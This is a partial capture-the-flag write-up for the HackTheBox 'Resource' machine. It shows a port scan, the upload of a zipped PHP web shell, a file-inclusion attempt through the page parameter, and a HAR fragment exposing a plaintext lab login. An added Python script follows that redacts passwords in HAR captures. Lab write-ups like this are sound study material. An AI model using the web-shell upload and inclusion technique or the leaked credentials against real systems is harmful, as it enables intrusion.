HACKTHEBOX - RESOURCE

Enumeration

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 d5:4f:62:39:7b:d2:22:f0:a8:8a:d9:90:35:60:56:88 (ECDSA)
|_ 256 fb:67:b0:60:52:f2:12:7e:6c:13:fb:75:f2:bb:1a:ca (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.25 seconds

There are two SSH ports, which is fairly unusual. There is also a redirect to itrc.ssg.htb, which we add to /etc/hosts.

It is possible to create a case by uploading a zip file.

We zip a pownyshell and upload it.

To create the zip:

zip shell.zip shell.php

The resulting link is:

http://itrc.ssg.htb/uploads/869008b7c8415318a37657fe0cc214f5032f9123.zip

Note that the page selection is done through a GET parameter:

http://itrc.ssg.htb/?page=dashboard

What if we tried this:

http://itrc.ssg.htb/?page=uploads/869008b7c8415318a37657fe0cc214f5032f9123.zip

That takes me back to my ticket, but nothing more.

  "bodySize": 37,
  "postData": {
    "mimeType": "application/x-www-form-urlencoded",
    "text": "user=msainristil&pass=82yards2closeit",
    "params": [
      {
        "name": "user",
        "value": "msainristil"
      },
      {
        "name": "pass",
        "value": "82yards2closeit"
      }
    ]
  }
},
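
The fragment above has the shape of a HAR request entry, where postData stores the submitted login form verbatim, once in text and once in params. As an added example (not part of the original writeup), here is a redaction pass that masks such fields before a capture is shared; the field-name list and the sample HAR are constructed assumptions.

```python
import json
from urllib.parse import parse_qsl, urlencode

# Assumed list of form-field names to treat as secrets; extend for your apps.
SENSITIVE = {"pass", "password", "passwd", "pwd", "token", "secret"}
MASK = "REDACTED"

def redact_post_data(post):
    """Mask sensitive fields in one HAR postData object; return names masked."""
    hits = []
    for p in post.get("params", []):
        if p.get("name", "").lower() in SENSITIVE:
            p["value"] = MASK
            hits.append(p["name"])
    # The raw body repeats the same values, so it has to be rewritten too.
    if post.get("mimeType", "").startswith("application/x-www-form-urlencoded"):
        pairs = parse_qsl(post.get("text", ""), keep_blank_values=True)
        for k, _ in pairs:
            if k.lower() in SENSITIVE and k not in hits:
                hits.append(k)
        post["text"] = urlencode(
            [(k, MASK if k.lower() in SENSITIVE else v) for k, v in pairs])
    return hits

def redact_har(har):
    """Redact every request in a parsed HAR; return (url, field) findings."""
    findings = []
    for entry in har.get("log", {}).get("entries", []):
        req = entry.get("request", {})
        post = req.get("postData")
        if not post:
            continue
        names = redact_post_data(post)
        findings.extend((req.get("url", ""), n) for n in names)
        if names:  # keep bodySize consistent with the rewritten body
            req["bodySize"] = len(post.get("text", "").encode())
    return findings

# Constructed sample with the same shape as the fragment above.
SAMPLE = {"log": {"entries": [{"request": {
    "method": "POST", "url": "http://app.example/login", "bodySize": 30,
    "postData": {"mimeType": "application/x-www-form-urlencoded",
                 "text": "user=alice&pass=constructed-pw",
                 "params": [{"name": "user", "value": "alice"},
                            {"name": "pass", "value": "constructed-pw"}]}}}]}}

if __name__ == "__main__":
    print(redact_har(SAMPLE))
    print(json.dumps(SAMPLE, indent=2))
```

Masking the copy does not undo an exposure: any credential that already appeared in a shared capture should be rotated.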